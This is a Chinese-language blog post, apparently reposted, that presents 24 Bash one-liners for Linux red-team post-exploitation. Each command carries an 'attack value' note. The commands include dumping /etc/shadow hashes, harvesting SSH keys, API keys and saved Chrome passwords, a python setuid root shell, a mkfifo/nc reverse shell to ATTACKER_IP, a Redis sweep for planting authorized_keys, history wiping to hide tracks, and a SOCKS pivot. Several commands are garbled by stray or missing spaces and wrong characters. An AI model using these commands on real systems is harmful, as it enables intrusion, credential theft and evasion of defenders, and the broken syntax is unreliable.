文章总结： 文档提供了24个高级Bash单行命令，适用于Linux渗透测试与红队行动。内容涵盖SUID提权、敏感信息搜集、横向移动及痕迹清理等关键攻击向量。这些命令帮助安全人员快速识别错误配置、窃取凭证并维持权限，是高效进行后渗透测试与内网侦查的实用工具集。 综合评分： 80 文章分类： 渗透测试,红队,内网渗透,安全工具

终极黑客 Bash 秘籍

原创

破天KK 破天KK

KK安全说

2026年1月21日 08:47 北京

高级的 Bash 单行命令可以让你：

• 查找其他扫描器遗漏的隐藏错误配置。
• 快速、自动执行权限提升检查。
• 在现实世界的红队中窃取数据并保持隐身。
• 无需重型工具即可跨网络转动。

🛠️ 高级黑客 Bash 单行代码

1. 🔍 查找 SUID 二进制文件（权限提升）

find / -type f -perm -40002>/dev/null

结果：列出设置了 SUID 的二进制文件（以文件所有者身份运行）。 攻击价值：攻击者搜索可用于生成 root shell 的错误配置的二进制文件。

2.🧪 搜索功能（Linux Priv Esc）

getcap -r / 2 > /dev/null

结果：列出具有 Linux 功能的文件（例如cap_setuid+ep）。 黑客价值：有时你可以滥用启用功能的二进制文件（例如python3具有 setuid 功能）来提升权限。

3. 🧩 查找可写的 Cron 作业

grep -R “” /etc/cron* 2 > /dev/ null

结果：显示 cron 任务定义。 黑客价值：如果你找到一个可以写入的脚本，你可以替换其内容，以便在 cron 任务运行时以 root 身份执行代码。

4.🛠️ 使用 PID 枚举正在运行的服务

ps aux | awk '{print$1，$2，$11 }' | uniq

结果：显示谁在运行哪个进程。 黑客价值：帮助攻击者发现值得关注的服务（例如 MySQL、Redis、Tomcat）及其所有者——这是权限提升的金矿。

5. 🔑 查找 SSH 密钥

find / -name "id_rsa"2>/dev/null

结果：列出 SSH 私钥。 攻击价值：获取密钥，并利用它访问网络中的其他机器。

6.🧵 从 /etc/shadow 提取哈希值（如果是 Root 用户）

cat /etc/shadow | awk -F: '{print $1 ":" $2}'

结果：转储用户名：哈希值对。 攻击价值：允许使用hashcat或离线破解密码john。非常适合横向移动。

7.🌐 从 ARP 表获取内部 IP

arp -a | awk '{print$2}' | tr -d '()'

结果：打印内部网络主机。 攻击价值：攻击者利用它来寻找关键目标，扩大攻击面。

8. 🧠 转储环境变量

printenv

结果：显示所有环境变量。 黑客攻击风险：有时包含数据库凭证、API 令牌、AWS 密钥——易于窃取。

9.🛸 扫描开放的 SMB 共享

for i in {1..254}; do smbclient -L 192.168.1.$i -N 2>/dev/null; done

结果：列出每个活跃主机上的 SMB 共享。 攻击价值：访问公共共享，提取敏感数据，甚至可能找到用于横向移动的凭证。

10. 📦 枚举已安装的软件包

dpkg -l | awk '{print$2}' | grep -E'mysql |php|apache'

结果：显示已安装的软件包。 黑客价值：帮助指纹识别服务和发现基于版本的漏洞。

11.🧵 扫描 WordPress 配置文件

find / var /www -name “wp-config.php” 2 > /dev/ null

结果：找到 WordPress 配置文件。 攻击价值：通常包含数据库凭据——转向数据库、转储用户/密码、升级。

12.🐍 通过 Python 生成 Root Shell（如果可写）

python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

结果：如果 Python 具有 setuid 功能或在 cron 中以 root 身份运行，则提供 root shell。 黑客价值：利用错误配置进行权限提升。

13.🗄️ 查找最近修改的文件

find / -type f -mtime - 1 2 > /dev/ null

结果：列出过去 24 小时内更改的文件。 攻击价值：适用于发现新丢弃的日志、凭证或备份。

14. 🔦 查找所有可写目录

find / -type d -perm -00022>/dev/null

结果：显示全局可写目录。 攻击价值：攻击者将有效载荷或恶意脚本投放到此处，以劫持 cron 作业或服务。

15. 🔀 通过命名管道实现反向 Shell

mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc ATTACKER_IP 4444 > /tmp/f

结果：使用 FIFO 管道创建隐秘的反向 shell。 攻击价值：比普通的 Bash 反向 shell 更具隐蔽性，有时甚至能绕过安全监控。

16.🛡️实时监控文件更改

inotifywait -m /etc

结果：当文件/etc被修改时打印。 攻击价值：非常适合持久化——监控防御者何时编辑配置，或监视新创建的凭证。

17. 🕵️‍♀️ Grep 查找代码中的硬编码秘密

grep -R "SECRET_KEY\|API_KEY" / var /www 2 > /dev/ null

结果：列出 Web 应用程序中包含 API 或密钥的行。 攻击价值：攻击者可滥用泄露的密钥进行横向移动或云帐户接管。

18. 🔧 提取 Chrome 保存的密码（如果被泄露）

sqlite3 ~/.config/google-chrome/Default/Login\ Data"SELECT origin_url, username_value, password_value FROM logins;"

结果：转储已存储的 Chrome 登录信息（密码已加密，但如有密钥即可解密）。 攻击价值：完美的后漏洞利用步骤，用于获取 Web 门户网站的凭证。

19. 📜 查找带有 Sticky Bits 的可执行文件

find / -type f -perm -10002>/dev/null

结果：列出粘滞位可执行文件。 攻击价值：罕见，但如果配置错误，可能会暴露权限提升向量。

20.🧲 扫描打开的 Redis 实例

for i in {1..254}; do (echo -e "PING\r\n" | nc -w 1 192.168.1.$i 6379 | grep PONG && echo"Redis open at $i") & done

结果：显示实时 Redis 服务器。 攻击价值：如果 Redis 未经身份验证，攻击者可以写入 SSH 密钥，/root/.ssh/authorized_keys从而立即获得 root 访问权限。

21.🎯 检查暴露历史记录

cat 〜/ .bash_history

结果：转储用户的命令历史记录。 黑客价值：许多管理员会意外输入密码或内部命令——即时情报。

22.🗑️ 清除你的踪迹（隐身）

history -c && history -w

结果：清除 Bash 历史文件。 攻击价值：攻击者利用此漏洞后隐藏其活动。

23. 🧰 枚举 Root 拥有的有趣文件

find / -user root -type f 2>/dev/null | grep -E "conf|key|cfg|secret"

结果：显示 root 用户拥有的敏感配置文件。 攻击价值：攻击者会寻找 SSH 密钥、数据库配置和秘密令牌，以进一步升级攻击。

24. 🛰️ 创建快速枢轴代理

ssh - D 1080 user@compromised _host

结果：通过受感染的主机打开 SOCKS 代理。 攻击价值：允许黑客从自己的机器上扫描内部网络。

#

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：KK安全说 破天KK 破天KK《终极黑客 Bash 秘籍》